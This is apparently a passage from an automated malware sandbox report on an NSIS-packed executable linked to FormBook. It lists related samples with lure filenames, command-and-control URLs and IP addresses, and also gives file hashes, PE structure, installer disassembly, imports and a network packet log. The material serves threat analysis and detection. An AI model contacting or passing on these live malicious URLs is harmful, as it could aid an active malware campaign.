                                                                                                                      • www.belaflorloja.online/m858/?Ob=7ouShKyUNVA5Yjh5wktAVtT2zGTEyGBxZvCLkyS5t8G4GMV8fEbeekSmji8tZe+tjjZfsA6F4HW6RYQ7SobZsIv2qKcuY+Z9nA==&0DlPP=LVnH
                                                                                                                      Sars_Notification.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                      • www.inovaebook.online/hcdq/?3pTtkr=TPpBnrlHjp7oqUUwWP4uPAudP8ECDd5zHIZVlBs9CPyINzXpvBB3k4Kl49OKAEEejwoXSTWpnbPZNrnimmcwjidSVaO96vqzTA==&fh6p7=Otrxtr3xWpM
                                                                                                                      Shipping_documentsInvoice_and_Packing_List,_Certificate_of_Origin.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.belaflorloja.online/udwf/?Hxp8=oFFL3vu9XQAr7FXg9tLvaYbPlZ5L8Wn7HJzEKcO8nyy/m3ryRIKVTbJ4UDOYwgR5jk0ohOkqMmAoILSQFXP7fgXauyzakeZHyA==&QF=wfstZByp0vjPet
                                                                                                                      INV#761538.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.alemdenos.online/cvps/?pf5=FkhLYzbpQfibhqTEjVzl439fT5cPXoNkmo03mbVgFl266UBJuqwM/M2FODzSdAcXOer9KJhrZBSz/SXf0IyDx/3tgZSE5tipVQ==&kDuhz=t6NP562HYH_
                                                                                                                      Mnp10GPUmthweWl.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.psiedithaguiar.online/cw88/?W0Ph22=HWW18yrCiVhSkE0NAjQIZzjUdyr2axjhwWhDLB4Nx1ta8ivjYzQ05WOv3dSX5++gMqQwwwOjuXoRvv9leLjfl5jezq4+oGq59g==&IH=JXiLf
                                                                                                                      Bank_receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.psiedithaguiar.online/cw88/?fNG46br=HWW18yrCiVhSkE0OMDRGfA79TWqFd2fhwWhDLB4Nx1ta8ivjYzQ05WOv3dSX5++gMqQwwwOjuXoRvv9leLjaveeHksUcukXX8w==&pbSp=EN5XenmHmjp
                                                                                                                      SOA_PAYMENT_OCTOBER_2023.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.belaflorloja.online/udwf/?v6z=oFFL3vu9XQAr7FXjltLFbpbEr5FxsFP7HJzEKcO8nyy/m3ryRIKVTbJ4UDOYwgR5jk0ohOkqMmAoILSQFXP6MGzw8RbozNluwQ==&D0=jDf0H8hP4jC0e4
                                                                                                                      8YR4efs2RpFwopI.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.psiedithaguiar.online/cw88/?9Lm=HWW18yrCiVhSkE0OMDRGfA79TWqFd2fhwWhDLB4Nx1ta8ivjYzQ05WOv3dSX5++gMqQwwwOjuXoRvv9leLjaveeHksUcukXX8w==&y2i=vLUd-L
                                                                                                                      NrL5b0aqVD.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.alemdenos.online/g81o/?GdlLq=G6MtrBcXOrUtq&4LHX32=OEtZmuXM0/Cid7KotjLyS3tfsUIOFWfP78EXyu/aZd3PQ5FK/6cWWicvr5d1I7rfxCfvdTKfRKM62FaBDXIcFCSz4AMSB6wcJw==
                                                                                                                      144.217.103.3Payment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • www.hmoatl.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=vUVAFHoFovduHd4/DKwXed3af3ePb0vry6dcW+l5/zrb0ZZNrBa0Shr1AhFt6JSAxzoXU5EndMSNZsLwoEVPEHAIn6yNHix56w==
                                                                                                                      207.244.126.150Payment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • www.speedbikesglobal.com/m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=89rK36yXGQSz/ZuNhGBEnsWtjb41/X7NemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyM5CO9qwuDsBag==
                                                                                                                      wlanext.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/
                                                                                                                      HSBC_Customer_Information.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?OXx=OPflBxUPCphXMp20&XLah9l3=9kePTKggf4eP6/DCHKgdnWln4uKoYRsxm+U+B1ESzIz+TmizgBdCe1eXOmqUrZ0x2YkFTu0erOvA47LCy4mEL/MRBTQYtxVXSsoBVZ4=
                                                                                                                      Pb1bUndg2D.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?nfexZ=P8d4wpDpRvETJR&7n=9kePTKggf4eP6/DFIrQNnhpCu/XQfyExm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrXL/U3LDwuqzk3b5g4OtBPtsbv
                                                                                                                      Quotation_package_RFQ_10750.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/
                                                                                                                      aMGTc878Pm.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?RJt=pBgxnLVH6&VHF=9kePTKggf4eP6/DCHLRWmSBnxOriYxsxm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrWFdkyLwYVqhYONQ==
                                                                                                                      8MlaKaB5fV.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?oT3HWl=9kePTKggf4eP6/DCHLRWmSBnxOriYxsxm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrWFdkyLwYVqhYONQ==&_lFx=FxBh
                                                                                                                      qWmFFs9EQd.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                      • www.speedbikesglobal.com/m858/?Ob=89rK36yXGQSz/ZuO5GBulbqy8ps5vwPNemxUOJ39n9Wf5fwkS2xU1yd0FUAiE8JtPib6/UyBojBD74+XNjIiyONbAuCwuDsFbw==&0DlPP=LVnH
                                                                                                                      q5yRKLZcqX.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • www.speedbikesglobal.com/zqco/?8Hwp60cP=9kePTKggf4eP6/DFIrQNnhpCu/XQfyExm+U+B1ESzIz+TmizgBdCPgqxO0yXofox2ok8ePda98byur78zYrXK/UiPCgroCk3Lg==&GZA=wvVL3b
                                                                                                                      Invoice_005241060.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                      • hoteldelcarmen.com.ar/tm5ahm.zip
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                      • 216.22.16.8
                                                                                                                      Pb1bUndg2D.exeGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      Quotation_package_RFQ_10750.xlsGet hashmaliciousFormBookBrowse
                                                                                                                      • 207.244.126.150
                                                                                                                      No context
                                                                                                                      No context
Process: C:\Windows\SysWOW64\typeperf.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209935793793442
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
MD5: 214CFA91B0A6939C4606C4F99C9183B3
SHA1: A36951EB26E00F95BFD44C0851827A032EAFD91A
SHA-256: 660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
SHA-512: E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
Malicious: false
Reputation: moderate, very likely benign file

Process: C:\Users\user\Desktop\BMhDm7YW62.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 203776
Entropy (8bit): 6.420338098094209
Encrypted: false
SSDEEP: 3072:6FslQcYDAB88t1V4YnZ97E3ofrA7oesrNmU3XA++9XxlA+grNRl:63LUB88l4Y5WsIcXALbgBr
MD5: 7673BEFD936A20FA9EB874383DEEDBFF
SHA1: EF9C4737AEB0EA4ACA651DCD42CDEC93B94F7A16
SHA-256: AE77829E72E4CAEB7F503B4D6E53708B2F3679C1B26C4F646B2C583775F7FC0F
SHA-512: 5DCE83198D054D632FDBF3B1D117E7E92A337FF279FAF003FB5470A385A021C4B541D0EBEB1B7AD3AC2CAE657F8FF6EA54C265716F0A18CF54B6235E0348935E
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 65%
Reputation: low

Process: C:\Users\user\Desktop\BMhDm7YW62.exe
File Type: data
Category: dropped
Size (bytes): 270866
Entropy (8bit): 7.999044897020019
Encrypted: true
SSDEEP: 6144:2MzIXQWSDcJHt1hevE9iO6Mnf7TUOi4bf8YeUYYcjTnNUyjj:2MzIrhJNOvRO6q0wehpD/
MD5: 32E64CB5E9C34A50D5B9015AFAD74D35
SHA1: 7387CF791028361276068BD0388DDE8B6C2632E2
SHA-256: 933FF72F200A2987476A151A3CF67DF6C016F22792A62EB596E3460CC6004F42
SHA-512: 76A813E37E65EF6059AD8C550BCB68BFB6FCEB2DF88AB4FCFAFF547E67DF71984DE61AEB20AC33D514C72EE4AB35C2B439258B7C3F7C2B705AAE702E62497CB6
Malicious: false
Reputation: low

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.919759837805585
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: BMhDm7YW62.exe
File size: 407'137 bytes
MD5: 67c64609c2542690d1d652d085a8f2bf
SHA1: 8017c9b1b9273f49bdc02e4b90de1cb767202c0b
SHA256: 3cc5b7aa1246d1f0bce5ffcabaa0525c40214012fc13998c711ac741ae71d4ce
SHA512: 350d6934b6e0201532d05e25b67ae4bb969bc05678699c44d6883d21b5d4b47045b90a1cff9b19b8e3dde020b72223ad29bfd2ea3ef1d81aaf30743db1af6db0
SSDEEP: 6144:3BlL/j1teResHZW7hUABOIHNydb8phKR7kBc3N9ZbmJHFoAZHpn2CRcscnPiZ:xhHefWO5Itk8w35oHFocJn2CRzcnPm
TLSH: 9684121DB2D629A3CCE60B7206727D11D5BE8C240435B5939291CFAFDA72D9F9B031A3
Icon Hash: 3dd5909890858585
Entrypoint: 0x4030fb
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b76363e9cb88bf9390860da8e50999d2
                                                                                                                      Instruction
                                                                                                                      sub esp, 00000184h
                                                                                                                      push ebx
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      xor ebx, ebx
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [esp+20h], ebx
                                                                                                                      mov dword ptr [esp+14h], 00409168h
                                                                                                                      mov dword ptr [esp+1Ch], ebx
                                                                                                                      mov byte ptr [esp+18h], 00000020h
                                                                                                                      call dword ptr [004070B0h]
                                                                                                                      call dword ptr [004070ACh]
                                                                                                                      cmp ax, 00000006h
                                                                                                                      je 00007F3280D78773h
                                                                                                                      push ebx
                                                                                                                      call 00007F3280D7B554h
                                                                                                                      cmp eax, ebx
                                                                                                                      je 00007F3280D78769h
                                                                                                                      push 00000C00h
                                                                                                                      call eax
                                                                                                                      mov esi, 00407280h
                                                                                                                      push esi
                                                                                                                      call 00007F3280D7B4D0h
                                                                                                                      push esi
                                                                                                                      call dword ptr [00407108h]
                                                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                                                      cmp byte ptr [esi], bl
                                                                                                                      jne 00007F3280D7874Dh
                                                                                                                      push 0000000Dh
                                                                                                                      call 00007F3280D7B528h
                                                                                                                      push 0000000Bh
                                                                                                                      call 00007F3280D7B521h
                                                                                                                      mov dword ptr [00423F44h], eax
                                                                                                                      call dword ptr [00407038h]
                                                                                                                      push ebx
                                                                                                                      call dword ptr [0040726Ch]
                                                                                                                      mov dword ptr [00423FF8h], eax
                                                                                                                      push ebx
                                                                                                                      lea eax, dword ptr [esp+38h]
                                                                                                                      push 00000160h
                                                                                                                      push eax
                                                                                                                      push ebx
                                                                                                                      push 0041F4F0h
                                                                                                                      call dword ptr [0040715Ch]
                                                                                                                      push 0040915Ch
                                                                                                                      push 00423740h
                                                                                                                      call 00007F3280D7B154h
                                                                                                                      call dword ptr [0040710Ch]
                                                                                                                      mov ebp, 0042A000h
                                                                                                                      push eax
                                                                                                                      push ebp
                                                                                                                      call 00007F3280D7B142h
                                                                                                                      push ebx
                                                                                                                      call dword ptr [00407144h]
                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7418 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2d000 | 0x46e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5aeb | 0x5c00 | False | 0.6651239809782609 | data | 6.42230569414204 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1196 | 0x1200 | False | 0.458984375 | data | 5.202917366589074 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1b038 | 0x600 | False | 0.4322916666666667 | data | 4.047511829596067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x25000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2d000 | 0x46e0 | 0x4800 | False | 0.3369683159722222 | data | 5.14881700232849 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x2d3b8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.18151969981238275
RT_ICON | 0x2e460 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.45614754098360655
RT_ICON | 0x2ede8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.33077617328519854
RT_ICON | 0x2f690 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.48963133640552997
RT_ICON | 0x2fd58 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3468208092485549
RT_ICON | 0x302c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.49024822695035464
RT_ICON | 0x30728 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.5497311827956989
RT_ICON | 0x30a10 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | United States | 0.5614754098360656
RT_ICON | 0x30bf8 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 128 | English | United States | 0.5032894736842105
RT_ICON | 0x30d28 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5844594594594594
RT_ICON | 0x30e50 | 0xb0 | Device independent bitmap graphic, 16 x 32 x 1, image size 64 | English | United States | 0.4943181818181818
RT_DIALOG | 0x30f00 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x31000 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x31120 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x31180 | 0xa0 | data | English | United States | 0.60625
RT_VERSION | 0x31220 | 0x1ec | data | English | United States | 0.4613821138211382
RT_MANIFEST | 0x31410 | 0x2cc | XML 1.0 document, ASCII text, with very long lines (716), with no line terminators | English | United States | 0.5656424581005587
DLL | Import
KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Dec 7, 2023 15:53:23.566282034 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.567135096 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.567291021 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.567338943 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.567547083 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.567739964 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.567789078 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.567970037 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.568032980 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.568089008 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.692284107 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.692312002 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.692364931 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.692423105 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.692465067 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.692519903 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.717823982 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.717885017 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.717925072 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.717978954 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.718015909 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.718055010 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.718760967 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.718853951 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.718897104 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.718935966 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719031096 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719072104 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.719095945 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719301939 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719341040 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.719409943 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719496965 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719535112 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.719559908 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719655037 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719688892 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.719726086 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719783068 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.719815016 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.777813911 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.844202042 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844223976 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844244003 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844264030 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844302893 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.844336033 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.844340086 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844379902 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.844409943 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844444990 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844497919 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.844608068 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.869378090 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.869436026 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.869467020 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.869507074 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.869561911 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.869600058 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.869671106 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.869707108 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.869729996 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.869766951 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.869843960 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.869879961 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:23.869898081 CET8049717173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:23.869936943 CET4971780192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:24.793946981 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:24.944947004 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:24.945064068 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:24.945382118 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:25.096419096 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:25.096472979 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:26.449856997 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:26.640579939 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.113048077 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.113070011 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.113208055 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.113208055 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.124141932 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.124234915 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.125122070 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.125137091 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.125150919 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.125190020 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.125228882 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.125228882 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.125277996 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.125329971 CET4971880192.168.2.11173.231.241.132
                                                                                                                      Dec 7, 2023 15:53:27.125458956 CET8049718173.231.241.132192.168.2.11
                                                                                                                      Dec 7, 2023 15:53:27.125473022 CET8049718173.231.241.132192.168.2.11
